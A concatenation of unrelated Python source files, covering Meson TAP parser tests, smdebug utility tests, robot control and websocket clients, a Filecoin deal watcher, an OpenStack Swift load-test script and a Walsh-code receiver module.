self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
check that Clang compiler is at least a specified version, whether AppleClang or regular Clang
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleCLang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
def main():
unset_envs()
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# All attempts at locating pytest failed, fall back to plain unittest.
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
raise SystemExit(main())
|
test_utils.py | # Third Party
# Standard Library
import os
import shutil
import tempfile
import time
from multiprocessing import Manager, Process
from os import makedirs
import pytest
# First Party
from smdebug.core.access_layer import (
DEFAULT_GRACETIME_FOR_RULE_STOP_SEC,
ENV_RULE_STOP_SIGNAL_FILENAME,
check_dir_exists,
is_rule_signalled_gracetime_passed,
)
from smdebug.core.collection_manager import CollectionManager
from smdebug.core.index_reader import ReadIndexFilesCache
from smdebug.core.json_config import (
DEFAULT_SAGEMAKER_OUTDIR,
add_collections_to_manager,
collect_hook_config_params,
get_include_collections,
get_json_config_as_dict,
)
from smdebug.core.locations import IndexFileLocationUtils
from smdebug.core.utils import SagemakerSimulator, is_first_process, is_s3
def test_normal():
rval = is_s3("a/b/c")
assert not rval[0]
def test_s3():
rval = is_s3("s3://a/b")
assert rval[0]
assert rval[1] == "a"
assert rval[2] == "b"
def test_s3_noprefix():
rval = is_s3("s3://a")
assert rval[0]
assert rval[1] == "a"
assert rval[2] == ""
def test_s3_noprefix2():
rval = is_s3("s3://a/")
assert rval[0]
assert rval[1] == "a"
assert rval[2] == ""
def test_check_dir_not_exists_local():
check_dir_exists("/home/ubuntu/asasdas")
def test_check_dir_exists():
try:
check_dir_exists("/home/ubuntu/")
assert False
except Exception as e:
pass
def test_check_dir_not_exists_s3():
check_dir_exists("s3://smdebug-testing/resources/doesnotexist")
def test_check_dir_exists_s3():
# This file should exist in the bucket for proper testing
check_dir_exists("s3://smdebug-testing/resources/exists")
def setup_rule_stop_file(temp_file, time_str, monkeypatch, write=True):
dir = os.path.dirname(temp_file.name)
rel_filename = os.path.relpath(temp_file.name, start=dir)
if write is True:
# write timestamp in temp file
temp_file.write(str(time_str))
temp_file.flush()
monkeypatch.setenv(ENV_RULE_STOP_SIGNAL_FILENAME, rel_filename)
def test_is_rule_signalled_gracetime_not_passed(monkeypatch):
temp_file = tempfile.NamedTemporaryFile(mode="w+")
time_str = str(int(time.time()))
setup_rule_stop_file(temp_file, time_str, monkeypatch)
dir = os.path.dirname(temp_file.name)
assert is_rule_signalled_gracetime_passed(dir) is False
def test_is_rule_signalled_gracetime_passed(monkeypatch):
temp_file = tempfile.NamedTemporaryFile(mode="w+")
time_str = str(int(time.time() - 2 * DEFAULT_GRACETIME_FOR_RULE_STOP_SEC))
setup_rule_stop_file(temp_file, time_str, monkeypatch)
dir = os.path.dirname(temp_file.name)
assert is_rule_signalled_gracetime_passed(dir) is True
def test_is_rule_signalled_no_env_var_set(monkeypatch):
assert is_rule_signalled_gracetime_passed("/fake-file") is False
def test_is_rule_signalled_no_signal_file(monkeypatch):
temp_file = tempfile.NamedTemporaryFile(mode="w+")
time_str = str(int(time.time() - 2 * DEFAULT_GRACETIME_FOR_RULE_STOP_SEC))
setup_rule_stop_file(temp_file, time_str, monkeypatch, write=False)
dir = os.path.dirname(temp_file.name)
# env variable is set, remove the file.
temp_file.close()
assert is_rule_signalled_gracetime_passed(dir) is False
def test_is_rule_signalled_invalid_gracetime(monkeypatch):
temp_file = tempfile.NamedTemporaryFile(mode="w+")
setup_rule_stop_file(temp_file, "Invalid_time", monkeypatch)
dir = os.path.dirname(temp_file.name)
assert is_rule_signalled_gracetime_passed(dir) is True
@pytest.mark.skip(reason="It's unclear what this is testing.")
def test_check_dir_not_exists():
with pytest.raises(Exception):
check_dir_exists("s3://smdebug-testing")
def test_index_files_cache():
"""
Test to verify that the index file cache is behaving as it should.
1. The cache should not save elements already present
2. The cache should remove its old elements when it attempts to save more elements
that its set limit.
"""
index_file_cache = ReadIndexFilesCache()
index_file_cache.add("file_1", None)
index_file_cache.add("file_1", None)
assert len(index_file_cache.lookup_set) == 1
assert index_file_cache.has_not_read("file_1") is False
assert index_file_cache.has_not_read("file_2") is True
index_file_cache.add("file_2", None)
index_file_cache.add("file_3", None)
index_file_cache.add("file_4", None)
assert len(index_file_cache.lookup_set) == 4
# Test cache eviction logic
index_file_cache.cache_limit = 2 # override cache limit
index_file_cache.add("file_5", "file_1")
assert len(index_file_cache.lookup_set) == 5 # No elements evicted
index_file_cache.add("file_6", "file_4")
assert (
len(index_file_cache.lookup_set) == 3
) # Elements in the cache will be file_4, file_5, file_6
def test_index_files_cache_insert_many_elements_in_the_first_read():
cache = ReadIndexFilesCache()
cache.cache_limit = 5
elements = ["a", "b", "c", "d", "e", "f", "g", "h"]
for e in elements:
cache.add(e, None)
# No files should be evicted because start_after_key has not been set
assert len(cache.lookup_set) == len(elements)
def test_get_prefix_from_index_file():
local_index_filepath = "/opt/ml/testing/run_1/index/000000000/000000000000_worker_0.json"
prefix = IndexFileLocationUtils.get_prefix_from_index_file(local_index_filepath)
assert prefix == "/opt/ml/testing/run_1"
s3_index_filepath = (
"s3://bucket-that-does-not-exist/run_1/index/000000000/000000000000_worker_0.json"
)
prefix = IndexFileLocationUtils.get_prefix_from_index_file(s3_index_filepath)
assert prefix == "s3://bucket-that-does-not-exist/run_1"
def test_json_params():
params_dict = get_json_config_as_dict(
json_config_path="tests/core/json_configs/all_params.json"
)
hook_params = collect_hook_config_params(params_dict)
include_collections = get_include_collections(params_dict)
coll_manager = CollectionManager()
add_collections_to_manager(coll_manager, params_dict, hook_params)
assert hook_params["include_workers"] == "one"
assert hook_params["save_all"] is True
assert coll_manager.get("weights").save_histogram is False
assert coll_manager.get("gradients").save_histogram is False
assert "weights" in include_collections
assert "gradients" in include_collections
assert len(include_collections) == 2
assert hook_params["export_tensorboard"] == True
assert hook_params["tensorboard_dir"] == "/tmp/tensorboard"
def test_json_params_sagemaker():
with SagemakerSimulator() as sim:
params_dict = get_json_config_as_dict(
json_config_path="tests/core/json_configs/all_params.json"
)
hook_params = collect_hook_config_params(params_dict)
include_collections = get_include_collections(params_dict)
coll_manager = CollectionManager()
add_collections_to_manager(coll_manager, params_dict, hook_params)
assert hook_params["include_workers"] == "one"
assert hook_params["save_all"] is True
assert coll_manager.get("weights").save_histogram is False
assert coll_manager.get("gradients").save_histogram is False
assert "weights" in include_collections
assert "gradients" in include_collections
assert len(include_collections) == 2
assert hook_params["export_tensorboard"] == True
assert hook_params["tensorboard_dir"] == sim.tensorboard_dir
@pytest.mark.parametrize("dir", [True, False])
def test_is_first_process(dir):
s3_path = "s3://this/is/a/valid/path"
assert is_first_process(s3_path)
# This section tests local path
for _ in range(10):
helper_test_is_first_process(dir)
def helper_test_is_first_process(dir):
temp_dir = tempfile.TemporaryDirectory()
path = temp_dir.name
shutil.rmtree(path, ignore_errors=True)
if dir:
makedirs(temp_dir.name)
process_list = []
def helper(fn, arg, shared_list):
shared_list.append(fn(arg))
manager = Manager()
results = manager.list()
for i in range(100):
p = Process(target=helper, args=(is_first_process, path, results))
p.start()
process_list.append(p)
for p in process_list:
p.join()
assert results.count(True) == 1, f"Failed for path: {path}"
|
client.py | import asyncio
from streaming import AsyncClient
import comms
import threading
import sys
import getopt
import tankcontrol
ip = "127.0.0.1"
port = 8084
usePiCam = False
size = 1
controller = tankcontrol.TankControl((11, 12), (15, 16))
disableMotor = False
try:
opts, args = getopt.getopt(sys.argv[1:], "ha:p:s:", [
"ip=", "port=", "size=", "usepicam", "disablemotor"])
except getopt.GetoptError:
print("ERROR: client.py -a <server ip> -p <port> -s <size> (--usepicam)")
exit()
for opt, arg in opts:
if opt == '-h':
print("client.py -a <server ip> -p <port> -s <size> (--usepicam)")
exit()
elif opt in ("-a", "--ip"):
ip = arg
elif opt in ("-p", "--port"):
port = int(arg)
elif opt in ("-s", "--size"):
size = int(arg)
elif opt == '--usepicam':
usePiCam = True
elif opt == '--disablemotor':
disableMotor = True
if not usePiCam:
import cv2
cap = cv2.VideoCapture(0)
client = AsyncClient(ip, port, usePiCam)
comms = comms.AsyncClient(ip, port + 1)
@client.on_get_frame()
def read_frame():
ret, frame = cap.read()
if ret:
h, w, _ = frame.shape
frame = cv2.resize(frame, (int(w / size), int(h / size)))
return frame
@comms.on_msg()
async def on_msg(msg):
#print(msg)
if "speed" in msg and "angle" in msg and not disableMotor:
controller.drive(msg["speed"], msg["angle"])
def comms_thread():
asyncio.run(comms.connect())
# start comms client on separate thread
t = threading.Thread(target=comms_thread)
t.start()
try:
asyncio.run(client.connect())
except KeyboardInterrupt:
pass
finally:
comms.close()
client.close()
controller.stop()
|
misty_wc.py | import json
from enum import Enum
import requests
import sys
import threading
from time import sleep
import websocket
from logging import getLogger
_logger = getLogger()
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if type(obj) in PUBLIC_ENUMS.values():
return str(obj.value)
if callable(obj):
return ""
result = obj.__dict__
result['__class_name__'] = obj.__class__.__name__
return result
class MistyEventInequality(Enum):
Equal = "=="
Greater = ">"
GreaterOrEqual = ">="
Less = "<"
LessOrEqual = "<="
class EventCondition:
Property = ""
Inequality = MistyEventInequality.Equal
Value = ""
def __init__(self, property, ineqality, value):
self.Property = property
if isinstance(ineqality, MistyEventInequality):
self.Inequality = ineqality
self.Value = value
# global stuff
PUBLIC_ENUMS = {
'MistyEventInequality': MistyEventInequality,
# ...
}
_je = JSONObjectEncoder()
class MistyWsEvent:
def __init__(self, ws_type, event_name, debounce, eventConditions, onMessage = None):
self.Operation = "subscribe"
self.Type = ws_type
self.EventName = event_name
self.DebounceMs = debounce
self.EventConditions = []
self.onMessage = onMessage
if isinstance(eventConditions, list) and len(eventConditions) > 0 and isinstance(eventConditions[0], EventCondition):
for ec in eventConditions:
self.EventConditions.append(ec)
def getSubscribeMsg(self):
return _je.encode(self)
def getUnsubscribeMsg(self):
return '{"Operation": "unsubscribe","EventName": "' + self.EventName + '"}'
def onMessageReceived(self, msg):
# Code here
_logger.debug(msg)
try :
if self.onMessage != None and callable(self.onMessage):
self.onMessage(msg)
except:
_logger.error( "Unexpected error:", sys.exc_info()[0])
return
class MistyWebClient:
def __init__(self, baseUrl):
self.MistyEvents = dict()
self.IsOpen = False
self.IsInError = False
self.IsClosed = False
self.BaseUrl = baseUrl
self.BaseApiUrl = "http://" + self.BaseUrl + "/api/"
self.ConnectTimeout = 2
self.ResponseTimeout = 20
def getJson(self, obj):
if hasattr(obj, "__dict__") or isinstance(obj, list):
return _je.encode(obj)
else:
return obj
def get(self, url, qs = "", headers = ""):
return requests.get(self.BaseApiUrl + url, params = qs, headers = headers, timeout = (self.ConnectTimeout, self.ResponseTimeout))
def post(self, url, data = None, json = None, headers = ""):
return requests.post(self.BaseApiUrl + url, data = data, json = json, timeout = (self.ConnectTimeout, self.ResponseTimeout))
def put(self, url, data = None, json = None, headers = ""):
return requests.put(self.BaseApiUrl + url, data = data, jason = json, timeout = (self.ConnectTimeout, self.ResponseTimeout))
def delete(self, url, qs = "", headers = ""):
return requests.delete(self.BaseApiUrl + url, params = qs, headers = headers, timeout = (self.ConnectTimeout, self.ResponseTimeout))
def addEvent(self, mistyWsEvent : MistyWsEvent):
if not isinstance(mistyWsEvent, MistyWsEvent):
raise TypeError
self.MistyEvents.update({mistyWsEvent.EventName : mistyWsEvent})
if self.IsOpen == True:
self.subscribe(mistyWsEvent)
def subscribe(self, mistyWsEvent : MistyWsEvent):
if self.IsOpen == False:
return
self.unsubscribe(mistyWsEvent)
msg = mistyWsEvent.getSubscribeMsg()
self.ws.send(msg)
sleep(1)
def unsubscribe(self, mistyWsEvent : MistyWsEvent):
if self.IsOpen == False:
return
msg = mistyWsEvent.getUnsubscribeMsg()
self.ws.send(msg)
sleep(1)
def removeEvent(self, eventName):
mistyWsEvent = self.MistyEvents.get(eventName, None)
if mistyWsEvent != None:
self.unsubscribe(mistyWsEvent)
self.MistyEvents.popitem(eventName)
def on_open(self):
_logger.debug("Openned")
self.IsOpen = True
def on_error(self, error):
_logger.error(error)
self.IsInError = True
def on_close(self):
_logger.debug("Listening Ended")
self.IsInError = False
self.IsOpen = False
self.IsClosed = True
def on_message(self, message):
try:
msgParsed = self.parseMsg(message)
if msgParsed == None : return
eventKey = msgParsed["eventName"]
event = self.MistyEvents.get(eventKey)
if event != None :
event.onMessageReceived(msgParsed)
_logger.debug(message)
except:
_logger.error("Unexpected error:", sys.exc_info()[1])
_cnt = 10
def parseMsg(self, msg):
msgParsed = {}
try:
msgParsed = json.JSONDecoder().decode(msg)
if type(msgParsed["message"]) is not dict :
if "Cannot register" in msgParsed["message"]:
_logger.debug(msgParsed["message"])
#self.stop_listener()
return None
if "registered" in msgParsed["message"]:
_logger.debug(msgParsed["message"])
#self.stop_listener()
return None
except:
print("Unexpected error:", sys.exc_info()[1])
return None
return msgParsed
def startListen(self, ip = "", enableTrace = False):
if ip == "" :
ip = self.BaseUrl
websocket.enableTrace(enableTrace)
wsPath = "ws://" + ip + "/pubsub"
self.ws = websocket.WebSocketApp(wsPath,
keep_running=True,
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
on_close=self.on_close)
self.ws_thread = threading.Thread(target=self.ws.run_forever)
self.ws_thread.daemon = True
self.ws_thread._running = True
self.ws_thread.start()
print('Websocket thread started')
cnt = 0
while (not self.IsOpen) and cnt < 5:
sleep(1)
cnt += 1
else :
if cnt >= 5 :
self.ws.close()
raise TimeoutError("Cant open Web Socket")
for e in self.MistyEvents.values():
self.subscribe( e)
return self.ws
def stopListen(self):
for e in self.MistyEvents.values():
self.unsubscribe( e)
self.ws.close()
def __init__():
_logger.debug("init misty_wc")
__all__ = ["MistyEventInequality", "EventCondition", "MistyWsEvent", "MistyWebClient"]
# Tests:
def onMsg(msg):
print(msg["message"]["distanceInMeters"])
ec = EventCondition("SensorPosition", MistyEventInequality.Equal, "Right")
tofrrEvent = MistyWsEvent("TimeOfFlight", "tof_r_r", 1000, [ec], onMsg)
print(tofrrEvent.getSubscribeMsg())
print(tofrrEvent.getUnsubscribeMsg())
# mwc = MistyWebClient("169.254.206.171")
# mwc.post("led", json='{"red":0, "green":0, "blue":250}')
# mwc.startListen()
# mwc.addEvent(tofrrEvent)
# j = mwc.getJson({"red":0, "green": 250, "blue": 0})
# print(j)
# mwc.post("led", json= j)
# sleep(5)
# mwc.post("led", json={"red":250, "green": 0, "blue": 0})
# mwc.stopListen()
# mwc.removeEvent(tofrrEvent)
# resp = mwc.post("led", json={"red":0, "green": 0, "blue": 250})
# print(resp)
|
deal_watcher.py | from pygate_grpc.client import PowerGateClient
from pygate_grpc.ffs import get_file_bytes, bytes_to_chunks, chunks_to_bytes
from google.protobuf.json_format import MessageToDict
from pygate_grpc.ffs import bytes_to_chunks
import redis
import json
import time
import threading
import fast_settings
import queue
import sqlite3
import coloredlogs
import logging
import sys
deal_watcher_logger = logging.getLogger(__name__)
formatter = logging.Formatter(u"%(levelname)-8s %(name)-4s %(asctime)s,%(msecs)d %(module)s-%(funcName)s: %(message)s")
stdout_handler = logging.StreamHandler(sys.stdout)
stdout_handler.setLevel(logging.DEBUG)
# stdout_handler.setFormatter(formatter)
stderr_handler = logging.StreamHandler(sys.stderr)
stderr_handler.setLevel(logging.ERROR)
deal_watcher_logger.addHandler(stdout_handler)
deal_watcher_logger.addHandler(stderr_handler)
coloredlogs.install(level='DEBUG', logger=deal_watcher_logger, stream=sys.stdout)
with open('settings.json') as f:
settings = json.load(f)
deals = dict()
deals_lock = threading.Lock()
def main():
r = redis.StrictRedis(
host=settings['REDIS']['HOST'],
port=settings['REDIS']['PORT'],
db=settings['REDIS']['DB'],
password=settings['REDIS']['PASSWORD']
)
p = r.pubsub()
p.subscribe('new_deals')
while True:
update = p.get_message(ignore_subscribe_messages=True)
if update:
deal_watcher_logger.debug('Got new deal update')
deal_watcher_logger.debug(update)
deal_to_be_watched = json.loads(update['data'])
deals_lock.acquire()
deals[deal_to_be_watched['jid']] = deal_to_be_watched
deals_lock.release()
deal_watcher_logger.debug('Current Deals to be watched set')
deal_watcher_logger.debug(deals)
time.sleep(5)
def job_checker():
sqlite_conn = sqlite3.connect('auditprotocol_1.db')
sqlite_cursor = sqlite_conn.cursor()
pow_client = PowerGateClient(fast_settings.config.powergate_url, False)
while True:
done_deal_jids = list()
deals_lock.acquire()
for deal_jid, deal in deals.items():
j_stat = pow_client.ffs.get_storage_job(jid=deal['jid'], token=deal['token'])
# print(j_stat.job)
if j_stat.job.status == 5: # 'JOB_STATUS_SUCCESS':
deal_watcher_logger.debug('Hurrah. Removing from deals to be watched...')
deal_watcher_logger.debug(j_stat.job)
done_deal_jids.append(deal_jid)
# update status
sqlite_cursor.execute("""
UPDATE accounting_records SET confirmed=1 WHERE cid=?
""", (deal['cid'], ))
sqlite_cursor.connection.commit()
elif j_stat.job.status == 3:
deal_watcher_logger.error('Job failed. Removing from deals to be watched...')
deal_watcher_logger.error(j_stat.job)
done_deal_jids.append(deal_jid)
# update status
sqlite_cursor.execute("""
UPDATE accounting_records SET confirmed=2 WHERE cid=?
""", (deal['cid'],))
sqlite_cursor.connection.commit()
for each_done_jid in done_deal_jids:
del deals[each_done_jid]
deals_lock.release()
time.sleep(5)
if __name__ == '__main__':
t1 = threading.Thread(target=main)
t2 = threading.Thread(target=job_checker)
t1.start()
t2.start()
t1.join()
t2.join() |
time3.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import time
import random
import datetime
from swiftclient import client
import threading
'''
if raw_input("restart swift or not (y/n):")=='y':
for k in os.popen('sudo python setup.py install').readlines():
pass
for j in os.popen('sudo swift-init main restart').readlines():
pass
# print j,
# time.sleep(0.02)
'''
def test(u,t):
#print "---",datetime.datetime.now()
try:
client.get_object(u,t,"ytf" ,"1.mp3" )
except:
pass
#print "***",datetime.datetime.now()
name = raw_input("Please input the name(for token):")
while not name:
name = raw_input("Please input the name(for token):")
if name == "Admin" or name == "sandy":
content = os.popen("curl -D- -H 'X-Storage-User:%s' -H 'X-Storage-Pass:admin' http://127.0.0.1:8080/auth/v1.0" %name).readlines()
else:
content = os.popen("curl -D- -H 'X-Storage-User:%s' http://127.0.0.1:8080/auth/v1.0" %name).readlines()
token = content[2].strip()
url = content[1].split(':',1)[-1].strip()
#for i in content:
# print i,
# time.sleep(0.3)
#print token
#getmethod = os.popen("curl -k -X GET -H '%s' %s" %(token,url)).readlines()
#for dd in getmethod:
# print dd,
# time.sleep(0.3)
geturl = '/'.join([url,'ytf9/'])
#print "curl -X GET -H '%s' %s"%(token,geturl)
#print "curl -X PUT -T ./1.txt -D- -H 'object_name:小酒窝' -H 'parent_secl_id:7' -H 'obj_seclevel:4' -H 'Content-Type:audio/mp3' -H '%s' %s" %(token,url)
t1 = 1
t2 = 100
token = token.split(": ")[-1]
global sum
sum = 0
r = random.randint(1,104)
#str1 = "curl -s -X GET -H '%s' %s/ytf%s/%sytf%s.txt"%(token,url,r,r,random.randint(1,10000))
try:
#str1=client.get_object(url,token,"ytf%s" % r,"%sytf%s.txt" % (r,random.randint(1,10000)))
str1=client.get_object(url,token,"ytf" ,"1.mp3" )
print str1
except Exception as e:
print e
threadpool=[]
for i in xrange(t1*t2):
th = threading.Thread(target = test,args = (url,token))
threadpool.append(th)
time1 = datetime.datetime.now()
print time1
for th in threadpool:
th.start()
for th in threadpool:
threading.Thread.join(th)
'''
for y in range(t1):
for x in range(t2):
r = random.randint(1,104)
try:
client.get_object(url,token,"ytf%s" % r,"%sytf%s.txt" % (r,random.randint(1,10000)))
except:
pass
'''
time2 = datetime.datetime.now()
print time2
print (time2-time1).microseconds
print (time2-time1).seconds
print '\033[1;31;40m'
print '*' * 50
print "OpenStack Swift Url:\t",url
print "Access User Name:\t",name
print "Average access time:\t",((time2-time1).microseconds/1000.000+((time2-time1).seconds)*1000)/(t1*t2),"ms"
print "File Numbers:\t\t","1049948"
print '*' * 50
print '\033[0m'
|
receiver.py | '''Receiver Module for receiving encoded data and decoding'''
import sys
import const
import threading
from datetime import datetime
# curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
class Receiver:
'''Receiver Class to receive sender sent encoded data and decode it to get the original data'''
def __init__(self, name, wls_table, channel_to_receiver):
self.name = name
self.wls_table = wls_table
self.channel_to_receiver = channel_to_receiver
self.sender_to_receiver = self.select_sender()
self.code_length = len(self.wls_table[0])
def select_sender(self):
'''Decodes which sender is sending which data'''
return self.name
def get_char(self, data):
'''Receives character sent by sender'''
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
with open('textfiles/logfile.txt', 'a+', encoding='utf-8') as rep_file:
rep_file.write("\n\n{} ||| DATA : {}".format(curr_datetime, str(data)))
summation = 0
for i in range(8): summation += pow(2,i) * data[7-i]
character = chr(summation)
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
with open('textfiles/logfile.txt', 'a+', encoding='utf-8') as rep_file:
rep_file.write("\n\n{} ||| CHAR RECEIVED : {}\n".format(curr_datetime, character))
return character
def open_file(self, sender):
'''Opens output file and writes down decoded message'''
try:
file_name = const.output_file_path + 'output' + str(sender+1) + '.txt'
fptr = open(file_name, 'a+', encoding='utf-8')
except FileNotFoundError as fnfe:
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
print("{} EXCEPTION CAUGHT : {}".format(curr_datetime, str(fnfe)))
sys.exit("No file exists with name {} !".format(file_name))
return fptr
def receive_data(self):
'''Receives Walsh encoded sender data and decodes it'''
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
with open('textfiles/logfile.txt', 'a+', encoding='utf-8') as rep_file:
rep_file.write("\n{} ||| RECEIVER-{} || RECEIVES DATA FROM SENDER-{}".format(curr_datetime, self.name+1, self.sender_to_receiver+1))
total_data = []
while True:
channel_data = self.channel_to_receiver.recv()
# extract data
summation = 0
for i in range(len(channel_data)): summation += channel_data[i] * self.wls_table[self.sender_to_receiver][i]
# extract data bit
summation /= self.code_length
if summation == 1: bit = 1
elif summation == -1: bit = 0
else: bit = -1
curr_datetime = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
with open('textfiles/logfile.txt', 'a+', encoding='utf-8') as rep_file:
rep_file.write("\n{} ||| RECEIVER-{} || BIT RECEIVED : {}".format(curr_datetime, self.name+1, bit))
if len(total_data) < 8 and bit != -1: total_data.append(bit)
if len(total_data) == 8:
character = self.get_char(total_data)
output_file = self.open_file(self.sender_to_receiver)
output_file.write(character)
output_file.close()
total_data = []
def start_receiver(self):
'''Initializes and terminates the receiver thread'''
receiver_thread = threading.Thread(name='Receiver-Thread', target=self.receive_data)
receiver_thread.start()
receiver_thread.join()
|
otb2owl.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: houzhiwei
# time: 2019/2/20 22:11
# TODO
from owlready2 import *
import json
import re
from JSON2OWL.OwlConvert.OwlUtils import OWLUtils
from JSON2OWL.OwlConvert.Preprocessor import Preprocessor
import datetime
module_uri = 'http://www.egc.org/ont/process/otb'
onto = get_ontology(module_uri)
# onto, skos, dcterms, props = OWLUtils.load_common(onto)
onto, shacl, skos, dcterms, props, foaf = OWLUtils.load_common(onto)
onto, geospatial = OWLUtils.load_geo_vocabl(onto)
onto, gb, task, data, cyber, context = OWLUtils.load_common_for_process_tool(onto)
print('ontologies imported')
with onto:
